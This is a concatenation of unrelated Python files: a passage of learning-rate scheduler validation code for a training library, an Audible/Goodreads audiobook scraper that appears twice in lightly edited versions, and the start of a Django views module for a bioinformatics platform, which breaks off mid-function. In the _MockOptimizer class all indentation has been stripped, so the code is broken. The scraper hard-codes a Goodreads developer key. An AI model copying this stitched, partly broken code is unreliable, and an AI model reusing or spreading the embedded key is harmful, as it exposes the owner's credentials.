                    'The lr scheduler dict must have the key "scheduler" with its item being an lr scheduler'
                )
            if "interval" in scheduler and scheduler["interval"] not in ("step", "epoch"):
                raise MisconfigurationException(
                    'The "interval" key in lr scheduler dict must be "step" or "epoch"'
                    f' but is "{scheduler["interval"]}"'
                )
            scheduler["reduce_on_plateau"] = isinstance(scheduler["scheduler"], optim.lr_scheduler.ReduceLROnPlateau)
            if scheduler["reduce_on_plateau"] and scheduler.get("monitor", None) is None:
                raise MisconfigurationException(
                    "The lr scheduler dict must include a monitor when a `ReduceLROnPlateau` scheduler is used."
                    ' For example: {"optimizer": optimizer, "lr_scheduler":'
                    ' {"scheduler": scheduler, "monitor": "your_loss"}}'
                )
            # OneCycleLR is designed to be stepped per batch; warn on the likely mistake.
            is_one_cycle = isinstance(scheduler["scheduler"], optim.lr_scheduler.OneCycleLR)
            if is_one_cycle and scheduler.get("interval", "epoch") == "epoch":
                rank_zero_warn(
                    "A `OneCycleLR` scheduler is using 'interval': 'epoch'."
                    " Are you sure you didn't mean 'interval': 'step'?",
                    category=RuntimeWarning,
                )
            config = LRSchedulerConfig(**scheduler)
        elif isinstance(scheduler, ReduceLROnPlateau):
            if monitor is None:
                raise MisconfigurationException(
                    "`configure_optimizers` must include a monitor when a `ReduceLROnPlateau`"
                    " scheduler is used. For example:"
                    ' {"optimizer": optimizer, "lr_scheduler": scheduler, "monitor": "metric_to_track"}'
                )
            config = LRSchedulerConfig(scheduler, reduce_on_plateau=True, monitor=monitor)
        else:
            # Bare scheduler object: config defaults apply.
            config = LRSchedulerConfig(scheduler)
        lr_scheduler_configs.append(config)
    return lr_scheduler_configs
def _configure_schedulers_manual_opt(schedulers: list) -> List[LRSchedulerConfig]:
    """Convert each scheduler into an `LRSchedulerConfig` for manual optimization.

    Keys that only apply under automatic optimization are dropped (with a
    warning), since the user calls `lr_scheduler.step()` themselves.
    """
    ignored = {"interval", "frequency", "reduce_on_plateau", "monitor", "strict"}
    configs = []
    for entry in schedulers:
        if not isinstance(entry, dict):
            configs.append(LRSchedulerConfig(entry))
            continue
        flagged = [key for key in entry.keys() if key in ignored]
        if flagged:
            rank_zero_warn(
                f"The lr scheduler dict contains the key(s) {flagged}, but the keys will be ignored."
                " You need to call `lr_scheduler.step()` manually in manual optimization.",
                category=RuntimeWarning,
            )
        kept = {key: entry[key] for key in entry if key not in ignored}
        configs.append(LRSchedulerConfig(**kept))
    return configs
def _validate_scheduler_api(lr_scheduler_configs: List[LRSchedulerConfig], model: "pl.LightningModule") -> None:
    """Check that every configured scheduler exposes the expected interface.

    Raises:
        TypeError: if a scheduler is not stateful (no `state_dict`/`load_state_dict`).
        MisconfigurationException: if a custom scheduler does not follow the PyTorch
            LRScheduler API and `lr_scheduler_step` is not overridden on the model.
    """
    for config in lr_scheduler_configs:
        scheduler = config.scheduler
        if not isinstance(scheduler, _Stateful):
            raise TypeError(
                f"The provided lr scheduler `{scheduler.__class__.__name__}` is invalid."
                " It should have `state_dict` and `load_state_dict` methods defined."
            )
        if not isinstance(scheduler, LRSchedulerTypeTuple) and not is_overridden("lr_scheduler_step", model):
            raise MisconfigurationException(
                f"The provided lr scheduler `{scheduler.__class__.__name__}` doesn't follow PyTorch's LRScheduler"
                " API. You should override the `LightningModule.lr_scheduler_step` hook with your own logic if"
                " you are using a custom LR scheduler."
            )
def _set_scheduler_opt_idx(optimizers: List[Optimizer], lr_scheduler_configs: List[LRSchedulerConfig]) -> None:
    """Attach to each scheduler config the index of the optimizer it is bound to.

    The scheduler's `.optimizer` is matched by identity against the returned
    optimizers; an explicit, conflicting `opt_idx` in the config is an error.
    """
    for config in lr_scheduler_configs:
        for opt_idx, opt in enumerate(optimizers):
            if config.scheduler.optimizer is opt:
                if config.opt_idx is not None and config.opt_idx != opt_idx:
                    raise MisconfigurationException(
                        "`opt_idx` set inside scheduler config does not match with the index"
                        " of the respective optimizer returned from `configure_optimizers`."
                    )
                config.opt_idx = opt_idx
                break
        else:
            # for/else: no optimizer matched this scheduler's `.optimizer`.
            raise MisconfigurationException(
                "Some schedulers are attached with an optimizer that wasn't returned from `configure_optimizers`."
            )
def _validate_optim_conf(optim_conf: Dict[str, Any]) -> None:
    """Warn about any keys in an optimizer config dict that are not recognized."""
    allowed = {"optimizer", "lr_scheduler", "frequency", "monitor"}
    unknown = {key for key in optim_conf if key not in allowed}
    if unknown:
        rank_zero_warn(
            f"Found unsupported keys in the optimizer configuration: {unknown}", category=RuntimeWarning
        )
class _MockOptimizer(Optimizer):
"""The `_MockOptimizer` will be used inplace of an optimizer in the event that `None` is returned from
`configure_optimizers`."""
def __init__(self) -> None:
super().__init__([torch.zeros(1)], {})
def add_param_group(self, param_group: Dict[Any, Any]) -> None:
pass # Do Nothing
def load_state_dict(self, state_dict: Dict[Any, Any]) -> None:
pass # Do Nothing
def state_dict(self) -> Dict[str, Any]:
return {} # Return Empty
def step(self, closure: Callable = None) -> None:
if closure is not None:
closure()
def zero_grad(self, set_to_none: Optional[bool] = False) -> None:
pass # Do Nothing
def __repr__(self) -> str:
return "No Optimizer"
|
import re
import goodreads_api_client as gr
import json
import urllib.request
import yaml
from tqdm import tqdm
from bs4 import BeautifulSoup
def audible(url):
    """Scrape book details from an Audible.com product page.

    Parses the JSON-LD metadata embedded in the page and returns a dict of
    ratings, publication date, duration, title, authors and narrators.
    """
    html = urllib.request.urlopen(url).read()
    soup = BeautifulSoup(html, features="html.parser")
    # Index 1: the ld+json block that carries the fields read below.
    jsn = soup.find_all("script", type="application/ld+json")[1]
    data = json.loads(jsn.contents[0])[0]
    # Duration looks like ISO-8601 "PT11H37M"; lstrip removes the P/T chars.
    # When there is no minutes part, m is "" and minutes falls back to 0.
    m = data["duration"].lstrip("PT").split("H")[1].split("M")[0]
    dic = {
        "audible_popularity": int(data["aggregateRating"]["ratingCount"]),
        "audible_score": float(data["aggregateRating"]["ratingValue"]),
        "year": int(data["datePublished"].split("-")[0]),
        "month": int(data["datePublished"].split("-")[1]),
        "day": int(data["datePublished"].split("-")[2]),
        "hours": int(data["duration"].lstrip("PT").split("H")[0]),
        "minutes": int(m) if m else 0,
        "image": data["image"],
        "title": data["name"].replace("'", "’"),
        "authors": [a["name"] for a in data["author"]],
        "narrators": [r["name"] for r in data["readBy"]],
        "audible": True,
    }
    return dic
def goodreads(grid):
    """Fetch book details (series, rating, popularity) from the Goodreads API.

    grid -- the Goodreads book id.
    """
    # print(f"scraping goodreads data from {grid}")
    # NOTE(review): API key hard-coded in source control — should live in
    # configuration/environment instead. Left unchanged here.
    key = "cQudYNjfcBYXcVj9w9zA"
    client = gr.Client(developer_key=key)
    result = client.Book.show(grid)
    dic = {}
    if result["series_works"]:
        # Normalize: a lone series arrives as a dict, several as a list.
        series = result["series_works"]["series_work"]
        series = [series] if not isinstance(series, list) else series
        dic["series"] = [s["series"]["title"].replace("'", "’") for s in series]
        dic["position_in_series"] = [s["user_position"] for s in series]
    dic["goodreads_score"] = float(result["average_rating"])
    dic["goodreads_popularity"] = int(result["ratings_count"])
    # print(f"goodreads data {dic}")
    return dic
def updated(book):
    """Return *book* enriched with Audible/Goodreads details and derived fields.

    Missing scraped fields are fetched lazily; values already present in
    *book* always win over freshly scraped ones.
    """
    if "title" not in book:
        book = {**audible(book["audible_url"]), **book}
    if "goodreads_score" not in book:
        book = {**goodreads(book["goodreads_id"]), **book}
    book["overall_score"] = (book["book"] + book["performance"]) / 2
    # Sorting key: author surname, then series name + zero-padded position, then title.
    a = [book["authors"][0].split()[-1]]
    if "Jr" in a:
        a = [book["authors"][0].split()[-2]]  # skip the "Jr" suffix, use the real surname
    if "series" in book:
        a += book["series"][0].split()
        # BUGFIX: use single quotes inside the f-string — nested double quotes
        # are a SyntaxError on Python < 3.12 (and inconsistent with this file).
        a.append(f"{float(book['position_in_series'][0]):05.2f}")
    a += book["title"].split(" ")
    a = [b for b in a if b not in ("The", "A")]  # drop leading articles
    book["sorting_key"] = "-".join(re.sub("[^A-Za-z0-9]+", "", b) for b in a)
    print(book["sorting_key"])
    if "series" in book:
        book["series_nested"] = [
            {"name": a, "position": b}
            for a, b in zip(book["series"], book["position_in_series"])
        ]
    if "tags" not in book:
        book["tags"] = []
    # book["tags"] = sorted(set(book["tags"] + input("Tags (space delimited):").split()))
    return book
def add_tags(books):
    """Adds tags to books.

    NOTE(review): the body currently only prints each tag per book — it never
    attaches anything to `books`. Looks unfinished; confirm intended behavior.
    """
    tags = [
        "short-stories",
        "novella",
        "fixup",
        "bildungsroman",
        "sci-fi",
        "dnf",
        "fantasy",
        "lgbt-characters",
        "feminism",
        "mental-illness",
        "epistolary",
        "racism",
        "bechdel-pass",
        "bechdel-fail",
        "surreal",
    ]
    for tag in tags:
        for book in books:
            print(tag)
def main():
    """Refresh every audiobook entry in the YAML database, in place."""
    f = "../../_data/audiobooks.yaml"
    # Context managers close the handles deterministically; the previous
    # version left both the read and write handles to the garbage collector.
    with open(f) as fh:
        books = yaml.load(fh, Loader=yaml.FullLoader)
    books = [updated(book) for book in books]
    with open(f, "w") as fh:
        yaml.dump(books, fh)
if __name__ == "__main__":
    # Entry point: run only when executed directly, not on import.
    main()
| import re
import goodreads_api_client as gr
import json
import urllib.request
import yaml
from tqdm import tqdm
from bs4 import BeautifulSoup
def audible(url):
    """Scrape book details from an Audible.com product page.

    Reads the embedded JSON-LD metadata and returns a dict with ratings,
    publication date, duration, title, authors and narrators.
    """
    html = urllib.request.urlopen(url).read()
    soup = BeautifulSoup(html, features="html.parser")
    # The second ld+json block is the one carrying the fields used below.
    jsn = soup.find_all("script", type="application/ld+json")[1]
    data = json.loads(jsn.contents[0])[0]
    # Duration is ISO-8601 style ("PT11H37M"); m is "" when minutes are absent.
    m = data["duration"].lstrip("PT").split("H")[1].split("M")[0]
    dic = {
        "audible_popularity": int(data["aggregateRating"]["ratingCount"]),
        "audible_score": float(data["aggregateRating"]["ratingValue"]),
        "year": int(data["datePublished"].split("-")[0]),
        "month": int(data["datePublished"].split("-")[1]),
        "day": int(data["datePublished"].split("-")[2]),
        "hours": int(data["duration"].lstrip("PT").split("H")[0]),
        "minutes": int(m) if m else 0,
        "image": data["image"],
        "title": data["name"].replace("'", "’"),
        "authors": [a["name"] for a in data["author"]],
        "narrators": [r["name"] for r in data["readBy"]],
        "audible": True,
    }
    return dic
def goodreads(grid):
    """Fetch series, rating and popularity for book id *grid* from Goodreads.

    NOTE(review): the developer key is committed to source — move it to
    configuration/environment.
    """
    # print(f"scraping goodreads data from {grid}")
    key = "cQudYNjfcBYXcVj9w9zA"
    client = gr.Client(developer_key=key)
    result = client.Book.show(grid)
    dic = {}
    if result["series_works"]:
        # A single series arrives as a dict; normalize it to a list.
        series = result["series_works"]["series_work"]
        series = [series] if not isinstance(series, list) else series
        dic["series"] = [s["series"]["title"].replace("'", "’") for s in series]
        dic["position_in_series"] = [s["user_position"] for s in series]
    dic["goodreads_score"] = float(result["average_rating"])
    dic["goodreads_popularity"] = int(result["ratings_count"])
    # print(f"goodreads data {dic}")
    return dic
def updated(book):
    """Return an audiobook dict enriched with audible and goodreads details.

    Values already present in *book* take precedence over scraped ones.
    """
    if "title" not in book:
        book = {**audible(book["audible_url"]), **book}
    if "goodreads_score" not in book:
        book = {**goodreads(book["goodreads_id"]), **book}
    book["overall_score"] = (book["book"] + book["performance"]) / 2
    # Sorting key: author surname, series + zero-padded position, then title.
    author_words = book["authors"][0].split()
    surname = author_words[-1]
    if surname == "Jr":
        surname = author_words[-2]
    parts = [surname]
    if "series" in book:
        parts += book["series"][0].split()
        parts.append(f"{float(book['position_in_series'][0]):05.2f}")
    parts += book["title"].split(" ")
    kept = [word for word in parts if word not in ("The", "A")]
    book["sorting_key"] = "-".join(re.sub("[^A-Za-z0-9]+", "", word) for word in kept)
    print(book["sorting_key"])
    if "series" in book:
        book["series_nested"] = [
            {"name": series_name, "position": position}
            for series_name, position in zip(book["series"], book["position_in_series"])
        ]
    book.setdefault("tags", [])
    return book
def add_tags(books):
    """Adds tags to books.

    NOTE(review): currently only prints each tag once per book and mutates
    nothing — appears to be an unfinished helper; confirm intent.
    """
    tags = [
        "short-stories",
        "novella",
        "fixup",
        "bildungsroman",
        "sci-fi",
        "dnf",
        "fantasy",
        "lgbt-characters",
        "feminism",
        "mental-illness",
        "epistolary",
        "racism",
        "bechdel-pass",
        "bechdel-fail",
        "surreal",
    ]
    for tag in tags:
        for book in books:
            print(tag)
def main():
    """Update every audiobook record in the YAML database file in place."""
    f = "../../_data/audiobooks.yaml"
    # BUGFIX: close the file handles deterministically with context managers;
    # previously both open() handles were never closed explicitly.
    with open(f) as fh:
        books = yaml.load(fh, Loader=yaml.FullLoader)
    books = [updated(book) for book in books]
    with open(f, "w") as fh:
        yaml.dump(books, fh)
if __name__ == "__main__":
    # Script entry point: only run when executed directly.
    main()
|
# Django imports
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.conf import settings # Access to project settings
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth import login as django_login # To distinguish from AJAX called login
from django.contrib.auth import logout as django_logout # To distinguish from AJAX called logout
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.core.validators import URLValidator
from django.core.mail import send_mail
from django.db.models import Q # https://docs.djangoproject.com/en/2.1/topics/db/queries/#complex-lookups-with-q-objects
from django.db.models import Max # https://docs.djangoproject.com/en/2.1/topics/db/aggregation/
from django.db.models import Count # https://stackoverflow.com/questions/7883916/django-filter-the-model-on-manytomany-count
from django.utils import timezone
#from django.utils.html import escape # https://docs.djangoproject.com/en/2.2/ref/utils/#module-django.utils.html
from django.views.decorators.csrf import csrf_exempt # https://stackoverflow.com/questions/17716624/django-csrf-cookie-not-set/51398113
# Get csrf_token
# https://stackoverflow.com/questions/3289860/how-can-i-embed-django-csrf-token-straight-into-html
from django.middleware.csrf import get_token
#Import database objects
from app.models import OBC_user, Tool, Workflow, Variables, ToolValidations, \
OS_types, Keyword, Report, ReportToken, Reference, ReferenceField, Comment, \
UpDownCommentVote, UpDownToolVote, UpDownWorkflowVote, ExecutionClient
from app.models import create_nice_id
#Import executor
from ExecutionEnvironment.executor import create_bash_script, OBC_Executor_Exception
# Email imports
import smtplib
from email.message import EmailMessage
# System imports
import io
import os
import re
import six
import time # for time.sleep
import uuid
import hashlib
#import datetime # Use timezone.now()
import logging # https://docs.djangoproject.com/en/2.1/topics/logging/
from collections import Counter, defaultdict
import urllib.parse # https://stackoverflow.com/questions/40557606/how-to-url-encode-in-python-3/40557716
# Installed packages imports
import simplejson
from ansi2html import Ansi2HTMLConverter # https://github.com/ralphbean/ansi2html/
#https://pybtex.org/
from pybtex.database import parse_string as parse_reference_string
import pybtex.database.input.bibtex
import pybtex.plugin
import requests # Used in DOI resolution
# https://github.com/lepture/mistune
import mistune
__version__ = '0.1.7rc'
# Get an instance of a logger
logger = logging.getLogger(__name__)
#GLOBAL CONSTANTS
g = {
'SERVER': 'https://www.openbio.eu',
'EMAIL': 'info@swww.openbio.eu',
'ADMIN': 'kantale@ics.forth.gr', # In case the email fail, use this instead
'DEFAULT_DEBUG_PORT': 8200,
'SEARCH_TOOL_TREE_ID': '1',
'DEPENDENCY_TOOL_TREE_ID': '2',
'VARIABLES_TOOL_TREE_ID': '3',
'SEARCH_WORKFLOW_TREE_ID': '4',
'SEARCH_REPORT_TREE_ID': '5',
'format_time_string' : '%a, %d %b %Y %H:%M:%S', # RFC 2822 Internet email standard. https://docs.python.org/2/library/time.html#time.strftime # '%Y-%m-%d, %H:%M:%S'
'instance_settings' : {
'cb62fc6f-f203-4525-bf40-947cbf51bda3': {
'port': 8200,
'controller_url': 'http://139.91.190.79:8080/post',
},
'341422c9-36c4-477e-81b7-26a76c77dd9a': {
'port': 8201,
'controller_url': 'http://139.91.190.79:8081/post'
},
'default': {
'port': 8200,
'controller_url': 'http://139.91.190.79:8080/post',
},
},
'instance_setting_not_found_printed': False,
'ansi2html_converter': Ansi2HTMLConverter(), # https://github.com/ralphbean/ansi2html/
'markdown': mistune.Markdown(escape=True), # If you care about performance, it is better to re-use the Markdown instance:
# escape=True should be the default option for mistune...
# 'pybtex': {
# 'pybtex_style': pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')(),
# 'pybtex_html_backend': pybtex.plugin.find_plugin('pybtex.backends', 'html')(),
# 'pybtex_parser': pybtex.database.input.bibtex.Parser()
# }
# materialize js tree icons
# https://materializecss.com/icons.html
'jstree_icons': {
'tools': 'settings',
'variables': 'chevron_right', # Tool variables
'workflows': 'device_hub',
'reports': 'description',
'references': 'link',
'users': 'person',
'qas': 'forum',
},
'url_validator': URLValidator(), # Can be customized: URLValidator(schemes=('http', 'https', 'ftp', 'ftps', 'rtsp', 'rtmp'))
'client_name_regex': r'^[\w]+$', # The regular expression to validate the name of exutation client
'client_max': 10, # Max number of execution clients
# Create the URL for the report generated in the OBC client
'create_client_download_report_url': lambda client_url, nice_id : urllib.parse.urljoin(client_url + '/', 'download/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_download_log_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'logs/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_check_status_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'check/id/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_pause_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/true'.format(NICE_ID=nice_id)),
'create_client_resume_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/{NICE_ID}/paused/false'.format(NICE_ID=nice_id)),
'create_client_abort_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'workflow/delete/{NICE_ID}'.format(NICE_ID=nice_id)),
'create_client_airflow_url': lambda client_url, nice_id: urllib.parse.urljoin(client_url + '/', 'admin/airflow/graph?dag_id={NICE_ID}&execution_date='.format(NICE_ID=nice_id)),
}
### HELPING FUNCTIONS AND DECORATORS #####
def md5(t):
    '''
    Hex digest of the MD5 hash of the given string (UTF-8 encoded).
    '''
    encoded = t.encode("utf-8")
    return hashlib.md5(encoded).hexdigest()
def valid_url(url):
    '''
    Check whether url is valid, using django's URLValidator.
    Returns True/False
    '''
    try:
        g['url_validator'](url)
    except ValidationError:
        return False
    return True
def user_is_validated(request):
    '''
    Is the email of the user validated?
    Returns True/False. Anonymous users and users without an OBC_user
    record are treated as not validated.
    '''
    if request.user.is_anonymous:
        #print ('User is anonymous')
        return False
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist:
        #print ('User does not exist')
        return False # This should never happen
    ret = obc_user.email_validated
    #print ('User is validated:', ret)
    return ret
def resolve_doi(doi):
    '''
    https://gist.github.com/jrsmith3/5513926
    Return a bibTeX string of metadata for a given DOI, or None when the
    DOI service does not answer with HTTP 200.
    Used in references_process_doi
    NOTE(review): uses plain http://dx.doi.org and relies on the service's
    redirect to https — consider requesting https directly.
    '''
    url = "http://dx.doi.org/" + doi
    headers = {"accept": "application/x-bibtex"}
    r = requests.get(url, headers = headers)
    if r.status_code == requests.codes.ok:
        return r.text
    return None
def replace_interlinks(text):
    '''
    Search for interlinks (t/..., w/..., r/..., u/..., c/... shorthand
    references) and replace each with an <a> tag whose onclick performs a
    javascript call. Only interlinks whose target actually exists in the
    database are replaced.
    '''
    ret = text
    def javascript_call(matched_string, arguments):
        '''
        Create the javascript call (anchor tag wrapping the matched text).
        '''
        func_call = '''window.OBCUI.interlink({});'''.format(simplejson.dumps(arguments))
        pattern = '''<a href="javascript:void(0);" onclick='{}'>{}</a>'''.format(func_call, matched_string)
        return pattern
    # Per entity type: a findall regex to locate candidates, an arguments
    # regex to destructure them, and an existence check against the DB.
    interlink_options = {
        'tools': {
            'findall': r'[^\w]([td]/[\w]+/[\w\.]+/[\d]+)',
            'arguments': r'(?P<type>[td])/(?P<name>[\w]+)/(?P<version>[\w\.]+)/(?P<edit>[\d]+)',
            'exists': lambda arguments: Tool.objects.filter(name__iexact=arguments['name'], version__iexact=arguments['version'], edit=int(arguments['edit'])).exists()
        },
        'workflows': {
            'findall': r'[^\w](w/[\w]+/[\d]+)',
            'arguments': r'(?P<type>w)/(?P<name>[\w]+)/(?P<edit>[\d]+)',
            'exists': lambda arguments: Workflow.objects.filter(name__iexact=arguments['name'], edit=int(arguments['edit'])).exists()
        },
        'references': {
            'findall': r'[^\w](r/[\w]+)',
            'arguments': r'(?P<type>r)/(?P<name>[\w]+)',
            'exists': lambda arguments: Reference.objects.filter(name__iexact=arguments['name']).exists()
        },
        'users': {
            'findall': r'[^\w](u/[\w]+)',
            'arguments': r'(?P<type>u)/(?P<username>[\w]+)',
            'exists': lambda arguments: OBC_user.objects.filter(user__username__iexact=arguments['username']).exists()
        },
        'comment': {
            'findall': r'[^\w](c/[\d]+)',
            'arguments': r'(?P<type>c)/(?P<id>[\d]+)',
            'exists': lambda arguments: Comment.objects.filter(pk=int(arguments['id'])).exists()
        }
    }
    for interlink_key, interlink_value in interlink_options.items():
        calls = set(re.findall(interlink_value['findall'], ' ' + text)) # We add a space (' ') so that we catch interlinks at the beginning of string
        for call in calls:
            #print ('call:', call)
            #print ('regexp:', interlink_value['arguments'])
            arguments = re.search(interlink_value['arguments'], call).groupdict()
            if interlink_value['exists'](arguments):
                ret = ret.replace(call, javascript_call(call, arguments))
    # tool_calls = set(re.findall(interlink_options['tools']['findall'], text))
    # for tool_call in tool_calls:
    #     arguments = re.search(interlink_options['tools']['arguments'], tool_call).groupdict()
    #     # Does this tool exists?
    #     if Tool.objects.filter(name=arguments['name'], version=arguments['version'], edit=arguments['edit']).exists():
    #         ret = ret.replace(tool_call, javascript_call(tool_call, arguments))
    return ret
def markdown(t):
    '''
    Render markdown `t` to HTML with mistune (https://github.com/lepture/mistune),
    unwrap a single surrounding <p>...</p> pair, then expand interlinks.
    '''
    md = g['markdown'](t)
    # Remove <p> at the start and </p> at the end
    s = re.search(r'^<p>(.*)</p>\n$', md, re.M | re.S)
    if s:
        ret = s.group(1)
    else:
        ret = md
    # Check for interlinks
    ret = replace_interlinks(ret)
    return ret
def jstree_icon_html(t):
    '''
    Build the materialize-icons <i> tag for the given jstree node type.
    '''
    icon_name = g['jstree_icons'][t]
    return '<i class="material-icons jsTreeMaterialIcons left md-18">{}</i>'.format(icon_name)
def fail(error_message=None):
    '''
    Build the JSON HttpResponse for a failed AJAX request.

    error_message -- human-readable reason returned to the client.
    '''
    ret = {'success': False, 'error_message': error_message}
    # Renamed local (was `json`): it shadowed the imported `json` module.
    payload = simplejson.dumps(ret)
    return HttpResponse(payload, content_type='application/json')
def success(data=None):
    '''
    Build the JSON HttpResponse for a successful AJAX request.

    data -- optional dict of payload fields; a 'success': True flag is added.

    BUGFIX: the previous signature used a mutable default argument
    (``data={}``) which is shared between calls and was mutated in the body.
    Use None as the sentinel instead; callers passing a dict are unaffected.
    '''
    if data is None:
        data = {}
    data['success'] = True
    payload = simplejson.dumps(data)
    return HttpResponse(payload, content_type='application/json')
def has_data(f):
    '''
    Decorator that passes AJAX data to a function parameters.

    POST: form-encoded fields are copied into kwargs; when request.POST is
    empty the raw body is parsed as JSON instead (bad JSON yields a fail()
    response). GET: query parameters are copied into kwargs.
    '''
    def wrapper(*args, **kwargs):
        # By convention the first positional argument is the Django request.
        request = args[0]
        if request.method == 'POST':
            if len(request.POST):
                for k in request.POST:
                    kwargs[k] = request.POST[k]
            else:
                try:
                    POST = simplejson.loads(request.body)
                except simplejson.errors.JSONDecodeError as e:
                    return fail('Could not parse JSON data')
                for k in POST:
                    kwargs[k] = POST[k]
        elif request.method == 'GET':
            for k in request.GET:
                kwargs[k] = request.GET[k]
                #print ("GET: {} == {}".format(k, kwargs[k]))
        return f(*args, **kwargs)
    return wrapper
def username_exists(username):
    '''
    True when a user with this username (case-insensitive) already exists.
    '''
    matches = User.objects.filter(username__iexact=username)
    return matches.exists()
def datetime_to_str(d):
    '''
    Format a datetime with the project-wide time format string.
    '''
    fmt = g['format_time_string']
    return d.strftime(fmt)
def convert_ansi_to_html(ansi):
    '''
    Create a nice standalone html page from stdout (ANSI escape sequences).
    https://github.com/ralphbean/ansi2html/
    Uses the shared converter instance from the module-level `g` dict.
    '''
    return g['ansi2html_converter'].convert(ansi)
def create_uuid_token():
    '''
    Random token for email validation: a uuid4 with the dashes removed.
    Length: 32 hex characters.
    '''
    # uuid4().hex is equivalent to str(uuid4()).replace('-', '').
    return uuid.uuid4().hex
def uuid_is_valid(uuid_token):
    '''
    Check whether uuid_token is a well-formed version-4 UUID.
    Adapted from https://gist.github.com/ShawnMilo/7777304
    '''
    try:
        normalized = uuid.UUID(uuid_token, version=4).hex
    except ValueError:
        return False
    # UUID(..., version=4) forces the version/variant bits, so comparing the
    # normalized hex against the input rejects tokens with the wrong bits.
    return normalized == uuid_token.replace('-', '')
def send_mail_smtplib(from_, to, subject, body):
    '''
    Standard email send function with SMTP (localhost server).
    Adjusted from here:
    https://docs.python.org/3/library/email.examples.html
    NOT USED! (Django's send_mail is used instead.)
    '''
    msg = EmailMessage()
    msg.set_content(body)
    msg['Subject'] = subject
    msg['From'] = from_
    msg['To'] = to
    s = smtplib.SMTP('localhost') # Send the message via our own SMTP server.
    s.send_message(msg)
    s.quit()
def request_port_to_url(request):
    '''
    Port suffix (e.g. ':8080') for building absolute URLs, or '' for the
    default http/https ports.
    '''
    port = request.META['SERVER_PORT']  # always a string
    if port in ('80', '443'):  # no port info for default http/https
        return ''
    return ':' + port
def create_validation_url(token, port=''):
    '''
    Absolute URL a user must visit to validate their email address.
    https://stackoverflow.com/a/5767509/5626738
    FIXME: "platform" should be derived from request.
    SEE: https://stackoverflow.com/questions/2491605/how-to-get-the-current-url-name-using-django
    '''
    return '{server}{port}/platform/?validation_token={token}'.format(
        server=g['SERVER'], token=token, port=port)
def create_password_email_url(token, port=''):
    '''
    Absolute URL for completing a password reset.
    See also create_validation_url for FIXME issue
    '''
    return '{server}{port}/platform/?password_reset_token={token}'.format(
        server=g['SERVER'], token=token, port=port)
def confirm_email_body(token, port=''):
    '''
    The mail verification mail body.
    The template below is a runtime string; the validation link is filled in
    from create_validation_url().
    '''
    ret = '''
Thank you for signing up to {server}
To complete your registration please click (or copy-paste to your browser) the following link:
{validation_url}
Regards,
The openbio.eu admin team.
'''
    return ret.format(server=g['SERVER'], validation_url=create_validation_url(token, port))
def reset_password_email_body(token, port=''):
    '''
    The email body for resetting a password.
    The template below is a runtime string; the reset link is filled in from
    create_password_email_url().
    '''
    ret = '''
Dear user,
Someone (hopefully you) has requested to reset the password at {server} .
If this is you, please go to the following link to complete the process:
{password_reset_url}
Otherwise please ignore this email!
Regards,
The openbio.eu admin team.
'''
    return ret.format(server=g['SERVER'], password_reset_url=create_password_email_url(token, port))
def validate_user(token):
    '''
    Validates a user from an email validation token.
    Returns: (True/False, message). On success the token is cleared so it
    cannot be reused.
    '''
    try:
        obc_user = OBC_user.objects.get(email_validation_token=token)
    except ObjectDoesNotExist:
        obc_user = None
    if obc_user:
        if obc_user.email_validated:
            return False, "User's email is already validated"
        else:
            #Validate user
            obc_user.email_validated = True
            #Delete validation token
            obc_user.email_validation_token = None
            obc_user.save()
            return True, 'Email successfully validated'
    else:
        return False, 'Unknown or deleted email validation token'
def password_reset_check_token(token):
    '''
    Check the token for password reset.
    Returns (ok, error_message, obc_user_or_None). Tokens expire 2 hours
    after password_reset_timestamp.
    '''
    try:
        obc_user = OBC_user.objects.get(password_reset_token=token)
    except ObjectDoesNotExist:
        obc_user = None
    if obc_user:
        timestamp = obc_user.password_reset_timestamp
        seconds = (now() - timestamp).total_seconds()
        if seconds > 3600 * 2: # 2 Hours
            return False, 'Password Reset Token expires after 2 Hours', None
        else:
            return True, '', obc_user
    else:
        return False, "Unknown token", None
def now():
    '''
    Current timezone-aware datetime (use this instead of datetime.now()).
    https://stackoverflow.com/a/415519/5626738
    https://stackoverflow.com/questions/18622007/runtimewarning-datetimefield-received-a-naive-datetime
    '''
    #return datetime.datetime.now()
    return timezone.now()
def check_password(password):
    '''
    Validate a candidate password.
    Returns (ok, error_message).
    '''
    if len(password) >= 6:
        return True, ''
    return False, 'Minimum password length is 6'
def send_validation_email_inner(request, email):
    '''
    Send an email validation email.
    Returns
        suc, error_message, uuid_token
    In DEBUG mode no mail is sent; the token is returned directly.
    '''
    uuid_token = create_uuid_token()
    if settings.DEBUG:
        #print ('VALIDATION EMAIL TOKEN:', uuid_token)
        #print ('URL: http://0.0.0.0:{}/platform/?validation_token={}'.format(request.META['SERVER_PORT'], uuid_token))
        return True, '', uuid_token
    try:
        send_mail(
            '[{server}] Please confirm your email'.format(server=g['SERVER']), # subject
            confirm_email_body(uuid_token, port=request_port_to_url(request)), # body message
            g['EMAIL'], # Sender, FROM
            [email], # List of recipients
        )
    # NOTE(review): deliberately broad catch — any mail failure is reported
    # back to the caller instead of crashing the request.
    except Exception as e:
        return False, 'Could not send an email to {email}. Contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN']), None # Better to add None
    return True, '', uuid_token
def None_if_empty_or_nonexisting(d, key):
    '''
    Return the stripped value of d[key], or None when the key is missing or
    the value is empty/whitespace. Handy for normalizing Ajax input.
    '''
    if key not in d:
        return None
    stripped = d[key].strip()
    return stripped if stripped else None
def tool_to_json(tool):
    '''
    Serialize a Tool into a minimal JSON-friendly dict (or None for no tool).
    '''
    if not tool:
        return None
    return dict(name=tool.name, version=tool.version, edit=tool.edit)
def workflow_to_json(workflow):
    '''
    Serialize a Workflow into a minimal JSON-friendly dict (or None).
    '''
    if not workflow:
        return None
    return dict(name=workflow.name, edit=workflow.edit)
def tool_text_jstree(tool):
    '''
